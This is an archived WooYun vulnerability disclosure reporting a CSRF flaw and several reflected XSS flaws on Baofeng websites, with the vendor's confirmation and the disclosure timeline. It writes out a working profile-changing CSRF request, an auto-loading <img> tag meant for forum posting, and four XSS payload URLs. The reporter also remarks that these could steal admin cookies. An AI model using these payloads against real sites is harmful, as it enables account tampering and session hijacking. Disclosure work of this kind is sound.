当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102557

漏洞标题:暴风影音一处CSRF以及多处XSS

相关厂商:暴风影音

漏洞作者: Airbasic

提交时间:2015-03-22 16:20

修复时间:2015-05-07 03:00

公开时间:2015-05-07 03:00

漏洞类型:CSRF

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-22: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商已经确认,细节仅向厂商公开
2015-04-02: 细节向核心白帽子及相关领域专家公开
2015-04-12: 细节向普通白帽子公开
2015-04-22: 细节向实习白帽子公开
2015-05-07: 细节向公众公开

简要描述:

暴风影音一处CSRF以及很多很多XSS

详细说明:

CSRF 修改用户资料:
http://user.baofeng.com/user/?a=updateinfo&username=aaa&name=&sex=1&provinceId=110000&cityId=110100&birthdayStr=&birthday=&interest=25%27&intro=&edu=&edu_bgd=&vocation=&is_mar=&mar=0&province=110000&city=110100&county=110101&film_type=&film_fes=&mon_pay=&contact=哈哈哈&callback=User.changeBaseInfoResult
论坛直接发个图就么么哒了

<img src="http://user.baofeng.com/user/?a=updateinfo&username=aaa&name=&sex=1&provinceId=110000&cityId=110100&birthdayStr=&birthday=&interest=25%27&intro=&edu=&edu_bgd=&vocation=&is_mar=&mar=0&province=110000&city=110100&county=110101&film_type=&film_fes=&mon_pay=&contact=哈哈哈&callback=User.changeBaseInfoResult"/>


多处XSS:
http://shop.baofeng.com/pay/pay_choose/0/0/2/?code=a%22/%3E%3Ch1%3Eaaa
http://user.baofeng.com/user/?a=sendCheckMail&callback=%3Ch1%3Eaaa
http://www.baofeng.com/q_YWFhJyUzQmFsZXJ0KCklM0J2YXIlMjBiJTNEJw==
http://adorders.huiyan.baofeng.com/Acl/user/loginin/message/%3Ch1%3Eaaa
那么多XSS不信骗不到管理的COOKIE = =

漏洞证明:

1

修复方案:

感觉好像没怎么注意XSS这块啊。。

版权声明:转载请注明来源 Airbasic@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-23 02:58

厂商回复:

感谢您对暴风影音的支持,我们会尽快修复,谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-25 22:04 | Airbasic ( 实习白帽子 | Rank:33 漏洞数:8 | 不要向我EMAIL发邮件,地址已失效!)

    哇,竟然送礼物了,给暴风影音666个赞啊。。